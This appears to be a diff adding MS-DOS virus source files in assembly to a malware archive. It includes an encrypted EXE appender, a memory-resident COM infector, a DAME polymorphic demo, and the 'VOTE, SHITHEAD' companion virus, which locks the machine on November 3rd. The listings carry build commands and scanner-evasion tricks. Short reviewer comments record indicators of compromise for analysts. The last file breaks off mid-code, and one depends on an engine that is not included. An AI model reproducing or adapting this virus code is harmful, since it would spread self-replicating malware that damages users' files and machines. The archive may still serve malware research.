@@ -0,0 +1,260 @@ +; ------------------------------------------------------------------------- ; +; Lacimehc v1.0 coded by KilJaeden of the Codebreakers 1998 ; +; ------------------------------------------------------------------------- ; +; Description: `-------------------| Started: 13/06/98 | Finished: 15/06/98 ; +; `-------------------^------------------- ; +; v1.0 - first attempt at .EXE infection, probably full of | Size: 597 ; +; - errors and unoptimized stuff, but I will fix all `---------- ; +; - that when I have a better understanding of what the ; +; - hell is actually going on, it's complicated! hehe ; +; v1.1 - added encryption to this exe appender! XOR,ROR,NEG ; +; ------------------------------------------------------------------------- ; +; ---------------> You Cannot Sedate All The Things You Hate <------------- ; +; ------------------------------------------------------------------------- ; +; to compile ::] tasm lacimehc.asm ; +; to link :::::] tlink /t lacimehc.obj ; +; ------------------------------------------------------------------------- ; + +code segment ; name our segment 'code' + assume cs:code,ds:code ; assign CS and DS to code + org 100h ; original is a .com file + +blank: db 0e9h,0,0 ; jump to beginning +start: call delta ; push IP on to the stack +delta: pop bp ; pop it into BP + sub bp,offset delta ; get the delta offset + + push ds es ; save original DS and ES + push cs cs ; push CS twice + pop ds es ; CS = DS = ES now + +decr: jmp once ; jump to once (overwritten) + lea si,[bp+encd] ; points to encrypted area + mov di,si ; move the value into DI + call encr ; call our decryption loop + jmp encd ; jump to main virus + +encr: lodsb ; load a byte into al + ror al,4 ; encryptin 1 + neg al ; encryptin 2 + xor al,byte ptr [bp+key] ; encryptin 3 -final- + neg al ; unencrypt 2 + ror al,4 ; unencrypt 1 + stosb ; return the byte + loop encr ; do this for all bytes + ret ; return from call + key db 0 ; our key value + +encd: mov ax,word ptr 
[bp+exe_cs] ; exe_cs and _cs + mov word ptr [bp+_cs],ax ; are now equal + + push [bp+exe_cs] ; save CS + push [bp+exe_ip] ; save IP + push [bp+exe_ss] ; save SS + push [bp+exe_sp] ; save SP + + mov ah,1ah ; set new DTA location + lea dx,[bp+offset dta] ; new DTA goes here + int 21h ; DTA is now moved + + mov ah,4eh ; find first file + lea dx,[bp+exefile] ; with extension .exe + mov cx,7 ; possible attributes + +findit: int 21h ; find a .exe + jnc cont ; found one? continue on + jmp exit ; return control to host + +cont: lea dx,[bp+dta+1eh] ; get file name info + mov ax,4300h ; get file attributes + int 21h ; get them now + push cx ; save the attributes + push dx ; and the file name info + + mov ax,4301h ; set file attributes + xor cx,cx ; to none at all + int 21h ; infect even read only now + + mov ax,3d02h ; open the file + int 21h ; file is opened + xchg bx,ax ; move file handle in BX + jnc cont2 ; no problems? continue on + jmp abort ; whoops, find another one + +cont2: mov ax,5700h ; get the time / date stamps + int 21h ; we have the stamps + push cx ; save the time + push dx ; save the date + + mov ah,3fh ; read from file + mov cx,1ch ; read the EXE header + lea dx,[bp+offset header] ; store it into 'header' + int 21h ; do the int 21 this time + + cmp word ptr [bp+header],'ZM' ; check for the initials + je cont3 ; its good, infect it + cmp word ptr [bp+header],'MZ' ; check for the initials + je cont3 ; its good, infect it + jmp next ; find next file + +cont3: cmp word ptr [bp+header+10h],'JK' ; check for our ID bytes + jne cont4 ; not done before, infect it + jmp next ; infected, get another one + +cont4: mov ax,word ptr [bp+header+18h] ; load AX with offset 40h + cmp ax,40h ; is this a WinEXE file? 
+ jnae cont5 ; nope, continue on + jmp next ; yup it is, get another one + +cont5: cmp word ptr [bp+header+1ah],0 ; check for internal overlays + je infect ; nope, infect this file now + jmp next ; there are, get another one + +infect: push bx ; save file handle + mov ax,word ptr [bp+header+0eh] ; get original SS into AX + mov word ptr [bp+exe_ss],ax ; save it into exe_ss + mov ax,word ptr [bp+header+10h] ; get original SP into AX + mov word ptr [bp+exe_sp],ax ; save it into exe_sp + mov ax,word ptr [bp+header+14h] ; get original IP into AX + mov word ptr [bp+exe_ip],ax ; save it into exe_ip + mov ax,word ptr [bp+header+16h] ; get original CS into ax + mov word ptr [bp+exe_cs],ax ; save it into exe_cs + + mov ax,4202h ; scan to end of file + xor cx,cx ; xor cx to 0 + cwd ; likewize for dx + int 21h ; DX:AX holds file size now + push ax dx ; save file size for awhile + + mov bx,word ptr [bp+header+8h] ; header size in paragraphs + mov cl,4 ; load CL with 4 + shl bx,cl ; multiply bx by 16 (4x4=16) + sub ax,bx ; subtract file size + sbb dx,0 ; if CF is set subtract 1 + mov cx,10h ; cx = 10h = 16 + div cx ; undue our mutiplying x16 + + mov word ptr [bp+header+14h],dx ; put the offset in + mov word ptr [bp+header+16h],ax ; segment offset of code + mov word ptr [bp+header+0eh],ax ; segment offset of stack + mov word ptr [bp+header+10h],'JK' ; put our ID in + + pop dx ax bx ; restore file size / handle + + add ax,finished-start ; add our virus size + adc dx,0 ; if CF add 1, if not, 0 + mov cx,512 ; convert to pages + div cx ; by dividing by 512 + inc ax ; round up + mov word ptr [bp+header+4],ax ; put the new PageCnt up + mov word ptr [bp+header+2],dx ; put the new PartPag up + + mov ax,4202h ; scan to end of file + xor cx,cx ; xor cx to 0 + cwd ; likewize for dx + int 21h ; DX:AX holds file size now + + in al,40h ; get a random value + mov byte ptr [bp+key],al ; save as our key + + mov ah,40h ; write to file + lea dx,[bp+start] ; starting here + mov cx,encd-start ; # of 
bytes to write + int 21h ; write them now + + lea di,[bp+finished] ; where to put bytes + push di ; save value + lea si,[bp+encd] ; where to get bytes + mov cx,finished-encd ; # of bytes to do + push cx ; save value + call encr ; encrypt the bytes + + mov ah,40h ; write to file + pop cx ; restore first value + pop dx ; restore second value + int 21h ; write them to file + + mov ax,4200h ; seek to start of file + xor cx,cx ; cx to 0 + cwd ; likewize for dx + int 21h ; at start of file now + + mov ah,40h ; write to file + lea dx,[bp+header] ; write the new header + mov cx,1ch ; # of bytes to write + int 21h ; write it now + +next: mov ax,5701h ; set time / date stamps + pop dx ; restore the date + pop cx ; restore the time + int 21h ; time / date are restored + + mov ah,3eh ; close the file + int 21h ; close it up now + +abort: mov ax,4301h ; set file attributes + pop dx ; for this file name + pop cx ; with these attributes + int 21h ; attributes are restored + + mov ah,4fh ; find next file + jmp findit ; start all over again + +exit: pop [bp+exe_sp] ; restore SP + pop [bp+exe_ss] ; restore SS + pop [bp+exe_ip] ; restore IP + pop [bp+exe_cs] ; restore CS + + mov ah,1ah ; restore the DTA + mov dx,80h ; new address for DTA + int 21h ; back to original location + + pop es ds ; pop ES and DS from stack + mov ax,es ; ax points to PSP + add ax,10h ; skip over the PSP + add word ptr cs:[bp+_cs],ax ; restoring CS + mov bx,word ptr cs:[bp+exe_ip] ; move the IP into bx + mov word ptr cs:[bp+_ip],bx ; save the IP into _ip + + cli ; clear interrupt flag + mov sp,word ptr cs:[bp+exe_sp] ; adjust ExeSP + add ax,word ptr cs:[bp+exe_ss] ; restore the stack + mov ss,ax ; adjust ReloSS + sti ; set interrupt flag + + db 0eah ; jmp far ptr cs:ip + +; ---------------------------( The Data Area )----------------------------- ; +; ------------------------------------------------------------------------- ; + + _ip dw 0 ; used as offset for db 0eah + _cs dw 0 ; used as offset for db 0eah + 
exe_cs dw 0fff0h ; original CS
+ exe_ip dw 0 ; original IP
+ exe_sp dw 0 ; original SP
+ exe_ss dw 0 ; original SS
+ exefile db "*.exe",0 ; infecting .exe files
+ header db 1ch dup (?) ; space for the header
+ dta db 43 dup (?) ; space for the new dta
+ finished: ; end of the virus
+
+; ---------------------( Not Saved / Not Encrypted )----------------------- ;
+; ------------------------------------------------------------------------- ;
+
+once: lea si,[bp+new] ; bytes to move
+ lea di,[bp+decr] ; to be moved here
+ movsw ; move two bytes
+ movsb ; move one byte
+ jmp encd ; jump to main body
+new: mov cx,finished-encd ; this replaces the jump
+
+; -----------------------------( The End )--------------------------------- ;
+; ------------------------------------------------------------------------- ;
+
+ code ends ; end code segment
+ end blank ; end / where to start
+
+; ------------------------------------------------------------------------- ;
+; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
+; ------------------------------------------------------------------------- ;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.laicos.asm b/MSDOS/Virus.MSDOS.Unknown.laicos.asm
new file mode 100644
index 00000000..2ce80789
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.laicos.asm
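Review bot: The header block is internally inconsistent about which revision this archived copy is: the title says `Lacimehc v1.0`, the changelog says `v1.1 - added encryption`, and the `Size: 597` box is not tied to any symbol in the file (`finished-start` is the only size the code itself uses), so the title line or a one-line note should say which revision the text is. For analysis the header should also record the two indicators the code exposes: the marker word `'JK'` written into the EXE header's initial-SP field (`mov word ptr [bp+header+10h],'JK'`, checked at `cont3`), and the fact that the XOR key comes from `in al,40h` (the timer counter port), so the appended body differs per infected file while the 1Ch-byte header marker does not. A comment such as `; indicator: word 'JK' at EXE header offset 10h (initial SP); body is XOR/ROR/NEG-encrypted with a per-file key from port 40h` would capture that.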
@@ -0,0 +1,193 @@ +; ------------------------------------------------------------------------- ; +; Laicos v1.4 coded by KilJaeden of the Codebreakers 1998 ; +; ------------------------------------------------------------------------- ; +; Description: `-------------------| Started: 06/06/98 | Finished: 07/06/98 ; +; `-------------------^------------------- ; +; v1.0 - memory resident *.com overwritter, MCB style | Size: 283 ; +; v1.1 - makes sure it is really a .com file `---------- ; +; v1.2 - add infection of any file + restores attributes ; +; v1.3 - add time/date restoration of infected files ; +; v1.4 - add XOR,NOT,NEG,ROR encryption to this ; +; ------------------------------------------------------------------------- ; +; Thanks: To SPo0ky!! I Could not have done this without his patience!!!! ; +; ------------------------------------------------------------------------- ; +; to compile ::] tasm laicos.asm ; +; to link :::::] tlink /t laicos.obj ; +; ------------------------------------------------------------------------- ; + +code segment ; name our segment 'code' + assume cs:code,ds:code ; assign cs and ds to code + org 100h ; this be a .com file + .286 ; need this for pusha/popa + +start: jmp first ; jump to first (overwritten) + xor bp,bp ; XOR the value of bp to 0 + lea si,encd ; load SI with encrypted area start + mov di,si ; DI points there now too + call encr ; call the encryption routine + jmp encd ; jump to encrypted area + +encr: lodsb ; load a byte + not al ; encryptin 1 + ror al,4 ; encryptin 2 + neg al ; encryptin 3 +key: xor al,0 ; encryptin 4 + neg al ; unencrypt 3 + ror al,4 ; unencrypt 2 + not al ; unencrypt 1 + stosb ; put the byte back + loop encr ; do it for all bytes + ret ; return from call + +encd: mov ax,0deadh ; move 0deadh into AX + int 21h ; if resident, 0deadh is in BX now + cmp bx,0deadh ; are we resident? 
+ jne go_rez ; nope were not, go rezident now + int 20h ; we are, terminate + +go_rez: sub word ptr cs:[2],80h ; lower top of memory data in PSP + mov ax,cs ; move CS into AX + dec ax ; decrement AX and + mov ds,ax ; move AX into DS + sub word ptr ds:[3],40h ; sub 1kb from accessed MCB + xor ax,ax ; ax to 0 + mov ds,ax ; DS has no value now + sub word ptr ds:[413h],2 ; adjust BIOS data area by 2kb + mov ax,word ptr ds:[413h] ; move adjusted BIOS mem to AX + mov cl,6 ; load cl with 6 + shl ax,cl ; multiply BIOS base mem by 64 + mov es,ax ; move the value into ES + push cs ; get cs again so you can + pop ds ; restore DS to original value + xor di,di ; DI must be 0 now + lea si,start ; load SI with start of virus + mov cx,finish-start ; # of bytes to write + rep movsb ; load the virus into memory + +hook: push es ; push the value in ES + pop ds ; pop it into DS + mov ax,3521h ; get the int 21h interrupt + int 21h ; get it now man! + mov word ptr ds:[oi21-100h],bx ; save the old one here + mov word ptr ds:[oi21+2-100h],es ; save it here too + mov ax,2521h ; point IVT to new ISR + lea dx,isr-100h ; load DX with start of ISR + int 21h ; IVT now points to new ISR + int 20h ; end now that we have hooked + +isr: pushf ; push all flags + cmp ax,0deadh ; have we added check value? + jne exec ; yup, wait for a 4bh + mov bx,0deadh ; nope, adding it now + popf ; pop the flags + iret ; pop cs:ip+flags from stack + +exec: pusha ; push all registers + push ds ; push value of DS + push es ; push ES as well + cmp ah,4bh ; something being executed? + je main ; yup, check if .com + jne exit ; nope, point to original ISR + +main: push ds ; push DS again + pop es ; and pop it into ES + mov di,dx ; move file name info to DI + mov cx,64 ; 64 byte file name possible + mov al,'.' ; load al with . + cld ; clear direction flag + repnz scasb ; scan until . is hit + cmp word ptr ds:[di],'OC' ; is it .CO- ? 
+ jne exit ; not a .com file, exit
+ cmp word ptr ds:[di+2],'M' ; check for .--M
+ jne exit ; not a .com file, exit
+
+ mov ax,4300h ; get the file attributes
+ int 21h ; we have them now
+ push cx ; save the values
+ push dx ; save the values
+ push ds ; save the values
+
+ mov ax,4301h ; set file attributes
+ xor cx,cx ; to none at all
+ int 21h ; set them now
+
+ mov ax,3d02h ; open the file then
+ int 21h ; file is now open
+ xchg ax,bx ; save the file info
+
+ push cs ; push 100h
+ push cs ; push it again
+ pop ds ; into DS
+ pop es ; into ES
+
+ mov ax,5700h ; get time / date stamps
+ int 21h ; we have the stamps now
+ push dx ; save the time
+ push cx ; save the date
+
+ in al,40h ; get random value
+ mov byte ptr cs:[key-100h+1],al ; save as our key
+
+ mov ah,40h ; write to file
+ lea dx,start-100h ; load start address
+ mov cx,encd-start ; # of bytes to write
+ int 21h ; write them now
+
+ mov bp,100h ; load bp with 100h
+ lea di,finish-100h ; end of encrypted stuff
+ lea si,encd-100h ; start of encrypted stuff
+ mov cx,finish-encd ; # of bytes to encrypt
+ cld ; clear direction flag
+ call encr ; call the encryption routine
+
+ mov ah,40h ; write to file
+ mov cx,finish-encd ; total # of bytes to write
+ lea dx,finish-100h ; write from here
+ int 21h ; write them now
+
+ mov ax,5701h ; restore time / date
+ pop cx ; from this value
+ pop dx ; and from this value
+ int 21h ; restore them now
+
+ mov ax,4301h ; set file attributes
+ pop ds ; restore from saved value
+ pop dx ; restore from this one too
+ pop cx ; and lastely, this one
+ int 21h ; attributes are restored
+
+ mov ah,3eh ; close the file
+ int 21h ; it's closed
+
+exit: pop es ; pop ES from stack
+ pop ds ; pop DS from stack
+ popa ; pop all registers
+ popf ; pop all flags
+ db 0eah ; jump to original ISR
+
+; --------------------------( The Data Area ) ----------------------------- ;
+; ------------------------------------------------------------------------- ;
+
+ oi21 dd ? ; old int 21 is here
+ finish label near ; the offset label
+
+; ---------------------( Not Saved / Not Encrypted )----------------------- ;
+; ------------------------------------------------------------------------- ;
+
+first: lea di,start ; load with start address
+ lea si,new ; overwrite with these bytes
+ movsw ; overwrite two bytes
+ movsb ; overwrite one byte
+ jmp encd ; jump to encrypted area start
+
+new: mov cx,finish-encd ; this will overwrite the jump
+
+; ----------------------------( Its All Over )----------------------------- ;
+; ------------------------------------------------------------------------- ;
+
+ code ends ; end code segment
+ end start ; end / where to start
+
+; ------------------------------------------------------------------------- ;
+; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
+; ------------------------------------------------------------------------- ;
diff --git a/MSDOS/Virus.MSDOS.Unknown.lame.asm b/MSDOS/Virus.MSDOS.Unknown.lame.asm
new file mode 100644
index 00000000..9c685e51
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.lame.asm
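Review bot: The description block lists only version history and omits the two runtime behaviours an analyst needs first: the residency handshake (`mov ax,0deadh` / `int 21h` / `cmp bx,0deadh`, answered by the `isr` branch that loads `bx,0deadh`) and the memory grab in `go_rez` (`sub word ptr ds:[413h],2` takes 2 KB off the BIOS top-of-memory word, after `sub word ptr ds:[3],40h` on the MCB). Both are observable from outside the sample — an int 21h call with AX=0DEADh that returns BX=0DEADh, and a conventional-memory total 2 KB lower than the machine's — and are exactly what the header should state for anyone triaging a resident infection. I would add `; indicators: int 21h AX=0DEADh returns BX=0DEADh when resident; BIOS memory count (0040:0013h) reduced by 2 KB` next to the version lines.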
@@ -0,0 +1,186 @@ + .code + .radix 16 + org 100 + +start: jmp temp ; The next two lines will be patched in +; cld ; DAME may have altered DF +; mov bx,ds + call calc_off + +old4 dw 20cdh, 0 +fmask db '*.com',0 +dmask db '..',0 + + db 0dh,'This is a lame virus slapped together by DA/PS',0Dh,0A + db 'To demonstrate DAME 0.91',0Dh,0A,1a + +vars = 0 + include dame.asm ; include the code portion of DAME + +calc_off: + pop si + mov ax,si + mov cl,4 + shr ax,cl + sub ax,10 + add ax,bx + mov bx,offset enter_vir + push ax bx + retf + +enter_vir: + mov di,100 + push es di es es + movsw + movsw +enter_vir0: + push cs cs + pop es ds + mov ah,1a + mov dx,offset new_dta ; set new DTA + int 21 + + mov ah,47 + cwd + mov si,offset old_path+1 + mov byte ptr [si-1],'\' + int 21 + + mov inf_cnt,4 + + call rnd_init_seed +inf_dir:mov ah,4e + mov dx,offset fmask +fnext: int 21 + jnc inf_file + + mov ah,3bh + mov dx,offset dmask + int 21 + jnc inf_dir +done_all: + mov ah,3bh + mov dx,offset old_path + int 21 + + pop es ds ; restore the DTA + mov dx,80 + mov ah,1a + int 21 + + retf ; return to carrier + +inf_file: + mov ax,3d00 + mov dx,offset new_dta + 1e + int 21 + jc _fnext + xchg ax,bx + + mov ah,3f + mov cx,4 + mov dx,offset old4 + int 21 + + mov ah,3e + int 21 + + cmp old4,0e9fc + jz _fnext + add al,ah + cmp al,'Z'+'M' + jz _fnext + call infect + dec inf_cnt + jz done_all +_fnext: + mov ah,4f + jmp short fnext + +infect: mov ax,3d00 + mov dx,offset new_dta + 1e + int 21 + push ax + xchg ax,bx + + mov ax,1220 + int 2f + + mov ax,1216 + mov bl,es:di + mov bh,0 + int 2f + + pop bx + + mov word ptr es:[di+2],2 + + mov ax,es:[di+11] + mov bp,ax + mov cx,4 + sub ax,cx + mov patch,ax + + mov ah,40 + mov dx,offset oFCE9 + int 21 + + mov word ptr es:[di+15],bp + + push es di cs + pop es + + mov si,100 + mov di,offset copyvirus + mov cx,(heap - start + 1)/2 + rep movsw + + mov ax,0000000000001011b + mov dx,offset copyvirus + mov cx,heap - start + mov si,offset _decryptbuffer + mov di,offset 
_encryptbuffer + push dx bx si + mov bx,bp + inc bh + call dame + + mov ah,40 + pop dx bx + int 21 + + mov ah,40 + mov cx,heap - start + pop dx + int 21 + + pop di es + or byte ptr es:[di+6],40 + + mov ah,3e + int 21 + + retn + +oFCE9 dw 0e9fc +heap: +patch dw ? +inf_cnt db ? + +vars = 1 + include dame.asm ; include the heap portion of DAME + +old_path db 41 dup (?) +new_dta db 2c dup (?) +_encryptbuffer: db 80 dup (?) +_decryptbuffer: db 1a0 dup (?) +copyvirus db heap - start + 20 dup (?) + +temp: mov byte ptr ds:[100],0fc + mov word ptr ds:[101],0db8c + xor di,di + push cs di cs cs + jmp enter_vir0 + + end start +--End LAME.ASM--Begin DAME.ASM------------------------------------------------- diff --git a/MSDOS/Virus.MSDOS.Unknown.lb-349.asm b/MSDOS/Virus.MSDOS.Unknown.lb-349.asm new file mode 100644 index 00000000..a07c2240 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lb-349.asm 
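Review bot: This file is not self-contained: it pulls in `include dame.asm` twice (once with `vars = 0` for code, once with `vars = 1` for the heap part) and the text ends at the marker `--End LAME.ASM--Begin DAME.ASM`, i.e. the archived listing was cut at the boundary of a two-file posting and the included engine is not in this file. A header comment should say so, e.g. `; NOTE: archived listing is incomplete — requires dame.asm (the "DAME 0.91" engine named in the banner string), which is not part of this file`, so nobody assumes the sample assembles or reads the `_encryptbuffer`/`_decryptbuffer`/`copyvirus` reservations as the full footprint. The note belongs at the top of the file, next to the `.radix 16` line, since that directive also affects how every bare number in the include must be read.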
@@ -0,0 +1,319 @@ +;**************************************************************************** +;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7. +;* +;* TASM/MASM compatible source listing +;* +;* VOTE, SHITHEAD is a resident, companion virus based upon Little +;* Brother code and library .asm routines extracted from Nowhere Man's VCL. +;* It is also 'patched' with three 'nops' (they are commented) which +;* effectively blind a number of a-v scanners. This simple alteration +;* demonstrates a practical benefit of source code possession: quick +;* generation of different virus strains becomes a task within anyone's +;* reach. The only tools needed are a number of virus scanners and patience. +;* +;* In any case, the VOTE virus is just the ideal sample needed for +;* judicious virus action. It is a PERFECT tool for viral spreading for +;* a number of reasons. First, it is a FAST infector. Once resident +;* VOTE will create a companion file for ANY .EXE executed on ANY drive +;* and it will do it so quickly that most users, even suspicious ones, +;* will not notice any slowdown or glitches in machine operation. +;* Second, 'companion-ed' .EXE's will continue to load and function +;* properly when VOTE is resident. At the start of the day's computing, +;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus +;* becomes resident. If it is re-called it will function perfectly. +;* Third, VOTE like the INSUFF viruses in the last newsletter strikes +;* directly at anti-virus suites vulnerable to 'spawning' infections (many +;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement +;* over the original virus's modus operandi which left them out in plane +;* sight in the directory. Last, VOTE is very small. In RAM, it is not +;* discernible, taking up slightly less that 0.25k. Characteristically, +;* this is NOT reported by a mem /c display. 
In fact, +;* VOTE is almost invisible to any number of standard diagnostic +;* tests. Memory maps by QEMM and Norton's SYSINFO will +;* report INT 21 hooked differently. But unless the user can compare +;* an uncontaminated INTERRUPT report with one when the virus IS present, +;* it's unlikely he'll know anything is different. Even then, VOTE is hard +;* to notice. +;* +;* On election day, November 3rd, VOTE will lock an infected machine into +;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively +;* across the monitor. Computing will be impossible on Nov. 3rd +;* unless VOTE is removed from the machine, a task accomplished by unmasking +;* all the hidden .COMfiles and deleting them while +;* the virus is NOT resident. At all other times, VOTE is almost completely +;* transparent. +;**************************************************************************** + +code segment + assume cs:code,ds:code,es:nothing + + .RADIX 16 + + +oi21 equ endit +nameptr equ endit+4 +DTA equ endit+8 + + +;**************************************************************************** +;* Check for activation date, then proceed to installation! +;**************************************************************************** + + org 100h + +begin: + call get_day ; Get the day, DOS time/date grab + cmp ax,0003h ; Did the function return the 3rd? + jne realstrt ; If equal, continue along stream + call get_month ; Get the month, DOS time/date grab + cmp ax,000Bh ; Did the function return November (11)? 
+ jne realstrt ; If equal, continue to blooie; if not + ; skip to loading of virus + + +blooie: mov dx, offset shithead ;load 'shithead' message + mov ah,9 ;display it and loop + int 21h ;endlessly until + jmp blooie ;user becomes ill and reboots + +realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM + nop ;a 'nop' to confuse tbSCAN + mov es,ax + nop ;a 'nop' to confuse Datatechnik's AVscan + mov di,0100h + mov si,di + mov cx,endit - begin ;length of SHITHEAD into cx + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + mov dx,offset ni21 + lodsw + cmp ax,dx ;check to see if virus is around + je cancel ; by comparing new interrupt (ni21) + stosw ; vector to current, if it looks + movsw ; the same 'cancel' operation + + push es ;set vector to new handler + pop ds + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extension masks for checking and naming routines;message text +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 +SHITHEAD db "DID YOU VOTE, SHITHEAD??" 
+ db 07h,07h,'$' + +;**************************************************************************** +;* Interrupt handler 24 +;**************************************************************************** + +ni24: mov al,03 ;virus critical error handler + iret ;prevents embarrassing messages + ;on attempted writes to protected disks + +;**************************************************************************** +;* Interrupt handler 21 +;**************************************************************************** + +ni21: pushf + + push es + push ds + push ax + push bx + push dx + + cmp ax,4B00h ;now that we're installed + jne exit ; check for 4B00, DOS excutions + +doit: call infect ; if one comes by, grab it + +exit: pop dx ; if anything else, goto sleep + pop bx + pop ax + pop ds + pop es + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +;**************************************************************************** +;* Try to infect a file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ;get old DTA + int 21 + push es + push bx + + push cs ;set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint ; here's where we grab a name + push di ; for ourselves + mov si,offset COM_txt ;is extension 'COM'? + + mov cx,3 + rep cmpsb + pop di + jz do_com ;if so, go to our .COM routine + + mov si,offset EXE_txt ;is extension 'EXE'? + nop ;'nop' to confuse SCAN v95b. 
+ mov cl,3 + rep cmpsb + jnz return + +do_exe: mov si,offset COM_txt ;change extension to COM + nop ;another 'nop' to confuse SCAN + call change_ext + + mov ax,3300h ;get ctrl-break flag + nop + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vector to new handler + pop ds ;virus handles machine + mov dx,offset ni24 ;exits on attempted writes + mov ah,25h ;to write-protected disks + push ax + int 21 + + lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target) + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h ; makes it hidden/system/read-only + ; do it + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,endit - begin ; write the virus to the created file + mov dx,offset begin ; CX contains length + mov ah,40h ; write to file function + int 21 + + mov ah,3Eh ;close the file + int 21 + + +return1: pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext ;execute EXE-file + +return: mov ah,1Ah ;restore old DTA + pop dx + pop ds + int 21 + + ret + +do_com: call findfirst ;is the COM-file a virus? + cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length + jne return ;no, so execute COM-file + mov si,offset EXE_txt ;does the EXE-variant exist? 
+ call change_ext + call findfirst + jnc return ;yes, execute EXE-file + mov si,offset COM_txt ;change extension to COM + call change_ext + jmp short return ;execute COM-file + +;**************************************************************************** +;* Search beginning of extension for name we will usurp +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,0 + repnz scasb + sub di,4 + ret + +;**************************************************************************** +;* Change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + +;**************************************************************************** +;* Get the day off the system for activation checking +;**************************************************************************** +get_day: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller +;************************************************************************* +;* Get the month off the system for activation checking +;************************************************************************* + +get_month: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dh ; Copy month into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller + + +endit: + +code ends + end begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lbrother.asm b/MSDOS/Virus.MSDOS.Unknown.lbrother.asm new file mode 100644 index 00000000..ba4ec960 --- /dev/null 
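Review bot: The comment block names the lineage ("based upon Little Brother code") but not the sibling file in this same directory; the resident handler and infector (`ni21`, `infect`, `do_exe`, `do_com`) appear near-identical to Little Brother v1, so a cross-reference such as `;* Derived from Little Brother v1 — compare Virus.MSDOS.Unknown.lbrother.asm in this directory` would help anyone diffing the two variants. For triage, the indicators worth recording in the same header are the companion file's attribute byte `00100111b` (read-only, hidden, system, archive) set at creation and the size check `cmp word ptr cs:[DTA+1Ah],endit - begin`: a hidden/system .COM whose length equals the virus body, beside an executed .EXE, is the on-disk signature the existing text only describes in prose.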
+++ b/MSDOS/Virus.MSDOS.Unknown.lbrother.asm 
@@ -0,0 +1,242 @@ +;**************************************************************************** +;* Little Brother Version 1 +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +FILELEN equ end - begin +RESPAR equ (FILELEN/16) + 17 +VERSION equ 1 +oi21 equ end +nameptr equ end+4 +DTA equ end+8 + + .RADIX 16 + + +;**************************************************************************** +;* Start the program! +;**************************************************************************** + +begin: cld + + mov ax,0DEDEh ;already installed? + int 21h + cmp ah,041h + je cancel + + mov ax,0044h ;move program to empty hole + mov es,ax + mov di,0100h + mov si,di + mov cx,FILELEN + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + movsw + movsw + + push es ;set vector to new handler + pop ds + mov dx,offset ni21 + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extensions +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,0DEDEh ;install-check ? + je do_DEDE + + push dx + push bx + push ax + push ds + push es + + cmp ax,4B00h ;execute ? 
+ jne exit + +doit: call infect + +exit: pop es + pop ds + pop ax + pop bx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + +do_DEDE: mov ax,04100h+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + push cs ;set new DTA + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint + mov si,offset EXE_txt ;is extension 'EXE'? + mov cx,3 + rep cmpsb + jnz do_com + +do_exe: mov si,offset COM_txt ;change extension to COM + call change_ext + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;create the file (unique name) + xor cx,cx + mov ah,5Bh + int 21 + jc return1 + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,FILELEN ;write the file + mov dx,offset begin + mov ah,40h + int 21 + cmp ax,cx + pushf + + mov ah,3Eh ;close the file + int 21 + + popf + jz return1 ;all bytes written? + + lds dx,dword 